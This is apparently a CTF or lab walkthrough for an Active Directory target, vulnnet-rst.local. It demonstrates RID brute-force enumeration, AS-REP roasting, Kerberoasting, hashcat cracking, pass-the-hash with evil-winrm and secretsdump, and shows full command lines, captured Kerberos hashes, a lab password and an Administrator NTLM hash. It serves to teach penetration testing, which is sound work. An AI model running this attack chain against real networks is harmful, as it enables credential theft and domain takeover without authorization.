Skip to content

Windows Tools

To enumerate and exploit Active Directory, there are plenty of tools. We will start one by one. As I use them, I'll add more explanation.

crackmapexec

We can enumerate users if we do have at least READ access for IPC$ share.

crackmapexec smb 10.10.81.3 -u 'guest' -p '' --rid-brute

Example output (SHORTED): 

┌─[parrot@parrot][~/Desktop]
└──╼ $crackmapexec smb 10.10.81.3 -u 'guest' -p '' --rid-brute
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\guest: 
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [+] Brute forcing RIDs
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  500: VULNNET-RST\Administrator (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  501: VULNNET-RST\Guest (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  502: VULNNET-RST\krbtgt (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  513: VULNNET-RST\Domain Users (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1109: VULNNET-RST\t-skid (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1110: VULNNET-RST\j-goldenhand (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1111: VULNNET-RST\j-leet (SidTypeUser)

To extract users, you can use this grap command: 

grep -oP '(?<=\\)\w+(?= \()' output.txt > usernames.txt
Example output: 
┌─[parrot@parrot][~/Desktop]
└──╼ $grep -oP '(?<=\\)[^\\ ]+(?= \(SidTypeUser\))' output.txt
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

GetNPUsers.py

ASREPRoasting

ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

We can retrieve Kerberos tickets using a tool called “GetNPUsers.py” in Impacket. This allows us to query ASREProastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames, which we enumerated previously during our SMB enumeration. 

GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.222.122 -usersfile userlist -no-pass -request -outputfile kerberos-users-found

Example output: 

┌─[parrot@parrot][~/Desktop]
└──╼ $GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.81.3 -u users.txt -no-pass -request -outputfile kerberos-users-found
Impacket v0.12.0.dev1+20231103.113049.2d00fc6a - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:dda93bdab23cc46be79eb99dc673bd6e$26b123176195736f8d31623b3e99722ac17ffe5e5c2720d5fb9f85b42c916f40a6587f2a7a8cfced2d387ba14247142b32777383f54cec8ad4b37f8d3174078d93baf1732757aaf43fc921aa5b1d213c71ef132eee02ac345f103e9d8e8426831413e6c9254a604afe26dc6bf9820207a13e051d14ce7b21a288b2ceb37030bd8819a4f57d5f4dafe25ced2c473406191a01308b8df3e345a88393d9bfa390ad13722dba7c2278e17493c5bafdb732da25a06ed063237737dc4b2e25c3ad3abe3a7be434b5af9dec2129eeb6d6c94d683296e8fda2d152de456ac422f97f3d60324903d7ae0de46921ac69b61f02ad80e7313079b2af
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

We can use hashcat to crack the hashes.

hashcat -m 18200 hashes.txt rockyou.txt

GetUserSPNs.py

Kerberoasting

Now that I have a set of standard user credentials, I started looking for supported Service Principal Name’s (SPN’s) and get Ticket Granting Service (TGS) for the SPN using “GetUserSPNs” tool from Impacket.

GetUserSPNs.py vulnnet-rst.local/t-skid:tj072889* -dc-ip 10.10.5.146 -request

This was successful and I was able to retrieve the TGS hash for the user enterprise-core-vn.

$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$6abf4cc44a39bdcd4105132ce2de79e2$94ceaec59d8fd2d6fc7e78163f5dec76f9d3d7d36f3ba72611c13023d17b1f58beb790bd1b8059235768103a637044b078084ccec48d415bf4c663bfd149f30f83e0478dbfa3c9533bca86bdb904fc8241fa66afd97f377c5e2e0113db73e2717435076243a9474c8b417b888d0de8eaa945119c9fa3613391b3ecf4226c1e94daadaa14dadfc3aae24047f1a828ef853322cec2b40afc43afc0f17832512ac671575525e95af19c1a7fae625f1c1be49caa84f927c84a39464387cb448caa738a75ac31a2c29f912faeaefa2091daf9182eb8551f06dc5160df89dd445e9c74127070827233af07d58df6a759727ccef8b8acb9982af7857d262f768dc330e4eea21e9e1c575ba90a7dca7d4be17fdc8c1c1c9d3603d877b022887e483f63538f5b794d32c4e7708fa8ed8b35e2aae0fd0f762acd690d44be1b142507142fa654aeda87906bdfc8ba6b81dbe6dc1be8d1331ea178e3a5f739eb2eb35207f946c91471e7a75c11616029b85d36ad2ed9c6135090bcb32416b81da0305bfa9c8a905c29a6ca3759ede8f96f18be22652d287b64ce6d7447b75d63136511c913930b9e1962cede06fde63001a7b70e3d16909a429a73c30f5e751c99c1d17a4521ac5aa1eaffa6746de8accb8312996689b86cfb94a898d066602e68512f865229511549eb30dbac994b543e1977b9105d19e0fef3982c4d7a71ae86d69429c9c19f2f330140cdf30e5231a82537626879950f988a074572c9273b2117c0c4497cab2f97b72aef6ef05658b9968bfffb91c21a7245e1a3b80f40f7177acd5d1062bc62d21c2874f62bd3cb4e48226037941c354a0017cec4434de5ccfd0791eed3fd4ed20f8e64c4b702bbb32526cf110e9f62a77c51d7f0607b9634b6b468fd864de6e440ae88d00b6c0381f1df8d17c53493ac66234e0f2195f83883e0bd015e0e26d324881c8674cdc7cf5e9c8ae72a95ff1fc72ddb4a14bbea1cd378c234350c97b638cd2e048f0b6c90df243d0fb3f9837d7baab629be6e6151a2c5bb366efb672b13884d071be58233768f4bf37bab374691af67cf0de44b92a182f5676e41ec44c56bb69419205523aad19cc9e5eae7401bebb2d694314d6118ef0fafde6c44c9e92c590e897bd8788cff0cf5b2184bcb284a7b78be8800fc46274296c1824c6a83da9f4e50f5f7f678a732d6ba3a55e14cad912ca53aa25eb9f3f327a1d4c22dccf26f37b9cc221fae2f36e3eba0722cf07570384fcb721b6762e6c7603ac0861755a59e5e52e2714fc0d9270e88e7c9629db8ae7027f8b23c0650d725d4153b5eb32395f1f56afad711bf691740ff5b554648a0553d2c66474b53129f7f26a581c4f339bb079f7770c5c3ced0f3f4615f3a535b81e26c26f385

I can now use hashcat to retrieve the password for this user account.

hashcat64.exe -m 13100 hash.txt rockyou.txt

evilwin-rm

With this new set of credentials, We are able to use evil-winrm to login and retrieve the user flag.

evil-winrm -u 'enterprise-core-vn' -p '*******' -i 10.10.128.52 -N

Pass the hash 

evil-winrm -i 10.10.196.132 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d

secretsdump.py

use “secretsdump.py” to dump the NTLM hashes for all the users on the DC machine. 

secretsdump.py a-whitehat:bNdKVkjv3RR9ht@10.10.87.137

[*] Service RemoteRegistry is in stopped state  
[*] Starting service RemoteRegistry  
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a  
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)  
**Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747a******************:::**

I was able to obtain the hash for the Administrator account and use evil-winrm to login and get the root flag.

evil-winrm -i 10.10.196.132 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d